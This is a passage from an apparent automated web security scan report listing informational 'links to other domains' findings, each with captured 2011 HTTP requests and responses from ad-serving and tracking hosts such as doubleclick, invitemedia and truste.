Content-Length: 2934
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787929/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwlzT0OgCAMhuGrmM6S0JYCdeNHT0PcnIx3t.j2Pkm_9AZm2BbSzHFdgMmQKKsPJjSABs4d9.aQU3EBq7qSpbijca8oiuwTzOk8TkK_6NMssULyahksz2sMyzj_eBJ8XoEzGbU-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DuWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%253D%253D_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
TQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3Dhttp://clk.atdmt.com/COM/go/335787929/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787929/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

13.16. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAOZtAAC4WwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=1.3871&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=71500&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=69816DAB-3F85-46AF-8D01-3B5FF6A6F956&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Famzn.us.house.redirect%2F%3Bcid%3Dpubmatic728%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbes-clck.com%2Fc%3Fi%3D1%24AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbt&line_item_id=728928&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"5\": 1313432697+ \"4\": 1313426573}"; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432697+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; camp_freq_p1="eJzjkuG4dJdZgEni54mln1gUGDW2ngTSBkwWvTOBNJcMx+sJbAKMErtmQmR33V8PlGW0APO5JDjOrGMByq4HyzJoMABlwGwuEY5Vx0H6Fm+aCJVhsGAAina9Aolu+/3nI7JodzM70AVdyKIA+Sgw2A=="; io_freq_p1="eJzjEufY4yLALPHzxNJPLAoMGgwGzBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJQB2LN02ESjBYMAAFJ6cBVW/7/ecjXBAABE8aYg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:33 GMT
Content-Type: text/html
Content-Length: 2934
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787929/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOhUAIRdGtGGonGUAYsBtjWI353a.Mexfs7kl44QZm2BdyY10XYEoMMidLYQLUDfWcR.MwaZvOaHZ2bHxIhE4NF4Wa1vEQ6qNEn6okC6l75pb5.19XptafToLPC48IGeU-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DuWIAAOZtAAC4WwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%253D%253D_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
TQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3Dhttp://clk.atdmt.com/COM/go/335787929/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787929/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

13.17. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37788
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
<hr /> \n <a href="http://bit.ly/atttrustewired" target="_blank"><b>
...[SNIP]...
<hr />\n <a href="http://bit.ly/ffdQkR" target="_blank"><b>
...[SNIP]...
</span>';

       var embedSwf = '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="77" height="16" style="position: relative"><param name="flashVars" value="bindingId=' + b.baseName + '_bi"/>
...[SNIP]...

13.18. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEDksdBQv2eRa00pZUQMZdIU&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:45:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEDksdBQv2eRa00pZUQMZdIU&amp;cver=1">here</A>
...[SNIP]...

13.19. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=mediamath HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 302 Found
Location: http://sync.mathtag.com/sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEPn5uWsxF0NimWaur9X3LMg&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:41:41 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 306
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://sync.mathtag.com/sync/img?mt_exid=4&amp;mt_ec=64ws&amp;mt_exuid=CAESEPn5uWsxF0NimWaur9X3LMg&amp;cver=1">here</A>
...[SNIP]...

13.20. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=xplusone1&_r=1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 302 Found
Location: http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEO8q_lxfqSJeauBhYJC8fKg&cver=1&_r=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:26:21 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 306
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://m.xp1.ru4.com/um?_r=1&amp;_o=62795&amp;_i=52786&amp;_u=CAESEO8q_lxfqSJeauBhYJC8fKg&amp;cver=1&amp;_r=1">here</A>
...[SNIP]...

13.21. http://creativeby1.unicast.com/assets/A250/N27522/M14414/P702/Q75332/script_300_250.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativeby1.unicast.com
Path:   /assets/A250/N27522/M14414/P702/Q75332/script_300_250.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /assets/A250/N27522/M14414/P702/Q75332/script_300_250.js?0.3136074389331043 HTTP/1.1
Host: creativeby1.unicast.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:18 GMT
Server: lighttpd
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=1800
Content-Type: text/javascript
ETag: "2864602429"
Last-Modified: Tue, 09 Aug 2011 14:11:52 GMT
P3P: policyref="/w3c/policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Age: 258
Via: 1.1 iad105101000000 (MII-APC/2.0)
Via: 1.1 iad105104000000 (MII-APC/2.0)
x-Message1: Powered by Mirror Image Internet
Via: 1.1 iad107102000000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 7443

   if(window.inDapIF||window.inFIF||window.inAOLFIF){VwFriendlyIframe=true;VwClosedDocument=true;}
   if(window.inFIF||window.inAOLFIF){VwClosedDocument=false;}
   if(window.inDapIF&&document.body&&document
...[SNIP]...
athToSelect.indexOf("https")==0)VwP75332SendR=false;
   VwP75332PathToDeliver=VwP75332PathToSelect.replace("select","deliver");
   if(!window.VwPlacementsToSelect)VwPlacementsToSelect=[];
   VwP75332ImgTag="<a href='http://ad.doubleclick.net/click;h=v2|3DF3|0|0|%2a|f;242163176;0-0;0;64903877;31-1|1;42468572|42486359|1;;;pc=[TPAS_ID]%3fhttp://www.nonstopsummerfun.com' target='unicastTarget'><img src='http://creativeby1.unicast.com/assets/A250/N27522/M14414/C458316/Wrigleys_Lifesaver_300x250_inpage_img.jpg' width='300' height='250' border=0>
...[SNIP]...

13.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1644008520393294&output=html&h=90&slotname=9046130370&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fpop6.com%2Fp%2Fmemsearch.cgi&dt=1313434739367&bpp=3&shv=r20110803&jsv=r20110719&correlator=1313434740483&frm=8&adk=2998568002&ga_vid=488407081.1313434615&ga_sid=1313434615&ga_hid=1935412276&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=94&dff=times%20new%20roman&dfs=16&biw=-12245933&bih=-12245933&ifk=2713277859&fu=0&ifi=1&dtd=1138 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 15 Aug 2011 19:05:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 3994
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pop6.com/p/memsearch.cgi%26hl%3Den%26client%3Dca-pub-1644008520393294%26adU%3Dwww.Carbonite.com/Business%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGnjToJVAJnAeL_BgDm6jN8AxL6Jw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110803/r20110719/abg.js"></script>
...[SNIP]...

13.23. http://hire.jobvite.com/CompanyJobs/Careers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:03 GMT
Content-Length: 51311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="careers_1.css"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">


<a href="http://www.ask.com/web?qsrc=&amp;o=0&amp;l=dir&amp;q=" class="txt3 b" id="nbl_webNavLink">Web</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">


<a href="http://www.ask.com/pictures?qsrc=&amp;o=0&amp;l=dir&amp;q=&amp;v=14" class="txt3 b" id="nbl_imagesNavLink">Images</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">


<a href="http://www.ask.com/news?qsrc=&amp;o=0&amp;l=dir&amp;q=" class="txt3 b" id="nbl_newsNavLink">News</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">


<a href="http://www.ask.com/videos?qsrc=&amp;o=0&amp;l=dir&amp;q=" class="txt3 b" id="nbl_videosNavLink">Videos</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">
<a id="collapsibleLink-more_control" href="http://www.ask.com/more" class="collapsibleLink txt3 b">More<span class="moreDropDown">
...[SNIP]...
<li>
<a href="http://www.ask.com/maps?qsrc=&amp;o=0&amp;l=dir&amp;fa=" class="txt3 b" style="">Maps</a>
...[SNIP]...
<li>
<a href="http://www.ask.com/local?qsrc=&amp;o=0&amp;l=dir&amp;what=" class="txt3 b" style="">Local</a>
...[SNIP]...
<td>
<a href="http://www.ask.com/ans?qsrc=&amp;o=0&amp;l=dir&amp;q=" class="txt3 b" style="">Q&amp;A</a>
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&amp;q=" class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.ask.com/recipes?qsrc=&amp;o=0&amp;l=dir&amp;q=&amp;vps=VT:RECP" class="txt3 b" style="">Recipes</a>
...[SNIP]...
<div id="top_navbar_logo" class="searchBoxSprite">


<a href="http://www.ask.com/?o=0&amp;l=dir&amp;qsrc=2990" title="Ask.com" onMouseDown="return ct(this,30733)"></a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/community">Community</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/company">Company Info</a>
...[SNIP]...
<li class="navMenuItem">
       <a class="" href="http://www.ask.com/about/perks">Perks</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/company">For Partners</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/help">Help Center</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/legal">Legal</a>
...[SNIP]...



<a href="http://www.ask.com/about" onMouseDown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
About</a>
...[SNIP]...



<a href="http://www.ask.com/about/legal/privacy" onMouseDown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
Privacy</a>
...[SNIP]...
</span>


<a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a>
...[SNIP]...



<a href="http://www.ask.com/advertise" onMouseDown="return ct(this,30738)" class="txt2 info l_nu" target="_top">
Advertise</a>
...[SNIP]...



<a href="http://www.ask.com/careers" onMouseDown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://answers.ask.com/" onMouseDown="return ct(this,52450)" class="txt2 info l_nu" target="_top">
Ask Answers</a>
...[SNIP]...



<a href="http://www.ask.com/iPhone" onMouseDown="return ct(this,54499)" class="txt2 info l_nu" target="_top">
iPhone</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" onMouseDown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
